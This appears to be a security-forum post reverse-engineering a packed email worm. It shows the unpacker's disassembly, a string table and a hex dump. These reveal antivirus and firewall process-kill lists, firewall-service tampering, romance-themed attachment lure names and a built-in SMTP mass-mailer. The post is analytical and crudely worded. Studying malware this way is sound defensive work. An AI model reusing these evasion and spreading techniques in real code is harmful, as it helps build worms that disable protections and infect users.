this file doesnt look hard to unpack in any way the procedures decryptors all look vaguely familiar
the code that fetches kernel32.base address and and getproc address seems to be stolen from iczelions downlaod site (there is a sample kernel.exe in there with source code that exactly shows how to fetch kernelbase and getproc address anything in an exe without import table
if my memory serves me right this crap is a byte to byte copy of that source
the 20 times loop decryptor seems to be stolen from several crackmes ive seen (yeah iirc its called tea or something)
Code:
this is the whole main body of the unpacker stub after it moved home a few times
003B05FA PUSH EDX ; ntdll.KiFastSystemCallRet
003B05FB PUSH ESI
003B05FC CALL <findingnemoimeansectionnames>
003B0601 LEA EBX, DWORD PTR DS:[EAX]
003B0603 INC EBX ; hotfix-6.00400000
003B0604 CMP DWORD PTR DS:[EBX], 63727372
003B060A JE SHORT 003B0653
003B060C MOV EBX, DWORD PTR DS:[EAX+C]
003B060F CMP DWORD PTR SS:[EBP+10], 1
003B0613 JE SHORT 003B0618
003B0615 MOV EBX, DWORD PTR DS:[EAX+14]
003B0618 MOV ECX, DWORD PTR DS:[EAX+10]
003B061B TEST ECX, ECX
003B061D JE SHORT 003B0653
003B061F MOV EAX, DWORD PTR SS:[EBP+18]
003B0622 CMP EBX, EAX
003B0624 JNZ SHORT 003B062D
003B0626 MOV EAX, DWORD PTR SS:[EBP+14]
003B0629 SUB EAX, EBX ; hotfix-6.00400000
003B062B MOV ECX, EAX
003B062D ADD EBX, DWORD PTR SS:[EBP+8]
003B0630 CMP DWORD PTR SS:[EBP+10], 1
003B0634 JE SHORT 003B0642
003B0636 PUSH DWORD PTR SS:[EBP+C]
003B0639 PUSH ECX
003B063A PUSH EBX ; hotfix-6.00400000
003B063B CALL 003B065F
003B0640 JMP SHORT 003B0653
003B0642 PUSH ECX
003B0643 PUSH EBX ; hotfix-6.00400000
003B0644 CALL <getprocandcall>
003B0649 PUSH DWORD PTR SS:[EBP+C]
003B064C PUSH ECX
003B064D PUSH EBX ; hotfix-6.00400000
003B064E CALL <wrappertosomecraphasher>
003B0653 TEST EDX, EDX ; ntdll.KiFastSystemCallRet
003B0655 JNZ SHORT 003B05F9
003B0657 MOV EAX, DWORD PTR SS:[EBP-4]
003B065A POPAD
003B065B LEAVE
003B065C RETN 14
after decrypting this wants to attack .mil .gov and .god all at the same time
Code:
Text strings referenced in hotfix-6:.text
Address Disassembly Text string
00401009 NOT EAX (Initial CPU selection)
00401147 PUSH hotfix-6.004031B8 ASCII "Registry Editor"
00401365 PUSH hotfix-6.004031D8 ASCII "microsoft"
00401383 PUSH hotfix-6.004031D0 ASCII ".gov"
004013A1 PUSH hotfix-6.004031C8 ASCII ".mil"
004014AE PUSH hotfix-6.004031F0 ASCII "*.*"
004014F0 PUSH hotfix-6.004031EC ASCII ".."
00401665 MOV DWORD PTR SS:[ESP], hotfix-6.004 ASCII "kernel32.dll"
00401676 PUSH hotfix-6.00403260 ASCII "RegisterServiceProcess"
0040169A PUSH hotfix-6.00403254 ASCII "//alsys.exe"
004016E4 PUSH hotfix-6.004031E4 ASCII "Agent"
0040170F PUSH hotfix-6.00403224 ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess"
00401723 PUSH hotfix-6.0040321C ASCII "Start"
0040173A PUSH hotfix-6.00403214 ASCII "SFC.DLL"
00401753 PUSH hotfix-6.00403200 ASCII "SfcIsFileProtected"
0040176E MOV ESI, hotfix-6.004031F4 ASCII "klllekkdkkd"
004017F4 PUSH hotfix-6.00403288 ASCII ".exe"
004019D7 PUSH hotfix-6.00403854 ASCII "%s, %d %s %04d %02d:%02d:%02d %c%02d%02d"
004019F3 PUSH hotfix-6.004038D8 ASCII "Dnsapi.dll"
00401A06 PUSH hotfix-6.004038CC ASCII "DnsQuery_A"
00401D1F MOV ESI, hotfix-6.004039A0 ASCII "From: <%s>
To: %s
Date: %s
Subject: %s
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="%s"
This is a multi-part message in MIME format.
--%s
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encodi"...
00401DAE PUSH hotfix-6.0040399C ASCII "220"
00401DC4 PUSH hotfix-6.00403988 ASCII "HELO localhost
"
00401E17 PUSH hotfix-6.00403984 ASCII "250"
00401E92 PUSH hotfix-6.00403974 ASCII "yahoo.com"
00401EAA PUSH hotfix-6.00403960 ASCII "MAIL FROM:<%s>
"
00401EF5 PUSH hotfix-6.00403984 ASCII "250"
00401F11 PUSH hotfix-6.00403950 ASCII "RCPT TO:<%s>
"
00401F5C PUSH hotfix-6.0040394C ASCII "25"
00401F72 PUSH hotfix-6.00403944 ASCII "DATA
"
00401FC1 PUSH hotfix-6.00403940 ASCII "354"
00402079 PUSH hotfix-6.00403934 ASCII "
--%s--
"
004020A0 PUSH hotfix-6.0040392C ASCII "
.
"
0040218B PUSH hotfix-6.00403E84 ASCII "%s%d"
004021AA PUSH hotfix-6.00403E80 ASCII "%s"
someone in some other thread asked if sexualimplications is probably rootcause of viral infections what better proof than this ?
Code:
00403000 �@.. @..2@...@......–C..~C..dC..RC..FC..6C..(C..�C...C...C..îB..
00403040 ÞB..ÈB..´B..¢B..ŒB..€B..pB..bB..TB..î@..þ@..�A.. A...A..@A..\A..
00403080 nA..zA..ŠA..šA..°A..¾A..ÊA..ÖA..ÞA..êA..öA..�B..�B..2B..DB......
004030C0 Ê@..¼@..¨@..œ@..P@..^@..n@..€@..Ž@......s..€�..€�..€...€4..€�..€
00403100 �..€�..€t..€....mcafee..taskmgr.hijack..f-pro...lockdown....msco
00403140 nfig....firewall....blackice....avg.vsmon...zonea...spybot..nod3
00403180 2...reged...rav.nav.avp.troja...viru....anti....alsys...Registry
004031C0 Editor..mil.....gov....microsoft...Agent.......*.*.klllekkdkkd.
00403200 SfcIsFileProtected..SFC.DLL.Start...SYSTEM\CurrentControlSet\Ser
00403240 vices\SharedAccess..//alsys.exe.RegisterServiceProcess..kernel32
00403280 .dll.....exe....A Precious Gift.Sent with Love..You're In My Tho
004032C0 ughts...Memories of You.A Toast My Love.You... In My Dreams.A Ro
00403300 se..Magic Power Of Love.Eternal Love....When Love Comes Knocking
00403340 ....A Is For Attitude...Come Relax with Me..A Rose for My Love..
00403380 Our Journey.Surrounded by Love..Come Dance with Me..Pages from M
004033C0 y Heart.You're my Dream.The Moon & Stars....Kisses Through E-mai
00403400 l...Dream of You....Heavenly Love...Happy I'll Be Your Bride....
00403440 A Dream is a Wish...Special Romance.Words in my Heart...You're i
00403480 n my Soul...Last Night..You're the One..Sending You All My Love.
004034C0 In Your Arms....If Loving You...Your Friend and Lover...I Love Y
00403500 ou Because..Destiny.Love Is.....I Would Dream...Path We Share...
00403540 I Love You with All I Am....I Love Thee.The Time for Love...When
00403580 You Fall in Love...Your Love Has Opened....My Love.Our Love is
004035C0 Free....Eternity of Your Love...I Love You Soo Much.Wrapped in Y
00403600 our Arms....Our Love Nest...Hugging My Pillow...Sending You My L
00403640 ove.The Dance of Love...Falling In Love with You....Why I Love Y
00403680 ou..A Kiss So Gentle....Miracle of Love.A Token of My Love..The
004036C0 Mood for Love...For You....My Love..Our Love Will Last..Inside M
00403700 y Heart.The Miracle of Love.Our Love is Strong..When I'm With Yo
00403740 u...Love Remains....I am Complete...I Dream of you..My Love.exe.
00403780 Love Postcard.exe...Love Card.exe...With Love.exe...Flash Postca
004037C0 rd.exe..flash postcard.exe..greeting postcard.exe...Greeting Pos
00403800 tcard.exe...greeting card.exe...Greeting Card.exe...postcard.exe
00403840 ....Postcard.exe....%s, %d %s %04d %02d:%02d:%02d %c%02d%02d....
00403880 Jan.Feb.Mar.Apr.May.Jun.Jul.Aug.Sep.Oct.Nov.Dec.Sun.Mon.Tue.Wed.
004038C0 Thu.Fri.Sat.DnsQuery_A..Dnsapi.dll......ABCDEFGHIJKLMNOPQRSTUVWX
00403900 YZabcdefghijklmnopqrstuvwxyz0123456789+/..............--%s--....
00403940 354.DATA....25..RCPT TO:<%s>....MAIL FROM:<%s>......yahoo.com...
00403980 @...250.HELO localhost......220.From: <%s>..To: %s..Date: %s..Su
004039C0 bject: %s..MIME-Version: 1.0..Content-Type: multipart/mixed;...b
00403A00 oundary="%s"....This is a multi-part message in MIME format...--
00403A40 %s..Content-Type: text/plain;...charset="iso-8859-1"..Content-Tr
00403A80 ansfer-Encoding: 7bit....%s..--%s..Content-Type: application/oct
00403AC0 et-stream;...name= "%s"..Content-Transfer-Encoding: base64..Cont
00403B00 ent-Disposition: attachment;...filename= "%s".......Zenia...Zoe.
00403B40 Zilya...Xenia...Xylia...Xandra..Willa...Wendy...Vicky...Vivian..
00403B80 Violet..Valora..Vanessa.Valda...Ula.Uma.Sharon..Silver..Rosa....
00403BC0 Ruby....Rita....Rae.Rachel..Queen...Peggy...Pamela..Olivia..Olga
00403C00 ....Nicole..Naomi...Natalie.Nora....Nina....Nova....Nadia...Maia
00403C40 ....Mary....Melody..Mimi....Myra....Linda...Lisa....Lolita..Lynn
00403C80 ....Laura...Lara....Kara....Kassia..Kyle....Kali....Kacey...Katr
00403CC0 ina.Janet...Jewel...Joanna..Juliet..Julie...Ida.Idona...Isabel..
00403D00 Iris....Ivana...Ivory...Helga...Holly...Haley...Gloria..Gilda...
00403D40 Gale....Faith...Emily...Evelyn..Eve.Erika...Eliza...Eden....Ebon
00403D80 y...Donna...Dora....Doris...Diana...Danielle....Daria...Damita..
00403DC0 Camille.Cara....Carla...Carmen..Clarissa....Chelsea.Caitlin.Bett
00403E00 ina.Blenda..Bridget.Briana..Bella...Becky...Barbra..Aldora..Alys
00403E40 ia..Amorita.Aretina.Ara.April...Anita...http://www.google.com/..
00403E80 %s..%s%d....ð>..........B@...0..°?..........Ö@..À0..Ø?..........
00403EC0 â@..è0..�?..........°C..�0......................�@.. @..2@...@..
00403F00 ....–C..~C..dC..RC..FC..6C..(C..�C...C...C..îB..ÞB..ÈB..´B..¢B..
00403F40 ŒB..€B..pB..bB..TB..î@..þ@..�A.. A...A..@A..\A..nA..zA..ŠA..šA..
00403F80 °A..¾A..ÊA..ÖA..ÞA..êA..öA..�B..�B..2B..DB......Ê@..¼@..¨@..œ@..
00403FC0 P@..^@..n@..€@..Ž@......s..€�..€�..€...€4..€�..€�..€�..€t..€....
00404000 ��RegSetValueExA..Ë�RegCloseKey.Ø�RegDeleteValueA.ì�RegOpenKeyEx
00404040 A.ADVAPI32.dll..&.CharLowerA..��PostMessageA..w�GetWindowTextA..
00404080 ã.FindWindowA.Þ.EnumWindows.×�wsprintfA.¡.DispatchMessageA..:�Ge
004040C0 tMessageA.z�SetTimer..USER32.dll..WS2_32.dll..˜�Process32Next.^�
00404100 TerminateProcess..†�OpenProcess.4.CloseHandle.–�Process32First..
00404140 r.CreateToolhelp32Snapshot..q�UnmapViewOfFile.�lstrcpyA..�GetT
00404180 ickCount..h�MapViewOfFile.T.CreateFileMappingA..S.CreateFileA.�
004041C0 lstrlenA..À�lstrcmpA..V�Sleep.µ�ReadFile..Î.FindClose.Ü.FindNext
00404200 FileA.i�GetFullPathNameA...�SetCurrentDirectoryA..Ò.FindFirstFil
00404240 eA..`.CreateMutexA..¹.ExitProcess.„�OpenMutexA..R�LoadLibraryA..
00404280 ½�lstrcatA..Á�GetSystemDirectoryA.*�GetProcAddress..�GetModuleH
004042C0 andleA..}�GetModuleFileNameA..S�GetDriveTypeA.f.CreateProcessA..
00404300 ¤�WriteFile.ø�GlobalAlloc.c�GetFileSize.ø.FreeLibrary.o.CreateTh
00404340 read..��HeapAlloc.£�GetProcessHeap..Ê�GetSystemTimeAsFileTime.Å.
00404380 FileTimeToSystemTime..â�GetTimeZoneInformation..KERNEL32.dll....
pamella peggy rosalyna and VIRGIN_LILY too
and if symantic is going to be relying on naming this packed.shit.no
then i think they are waiting for
unpacked.givenintheplatter.spoonfedbytwomanservervents.stomachpressedbymaidforeasydigestion.whileavi ssittingoncommode.readytoshit.1000
to find a signature and specify wtf this is authoritatively
i have attached a fully disassembly copy from ollydbg of unpacked executable when it is on oep
havefun
btw attachemnt is not viral unless notepad has some vulnerability 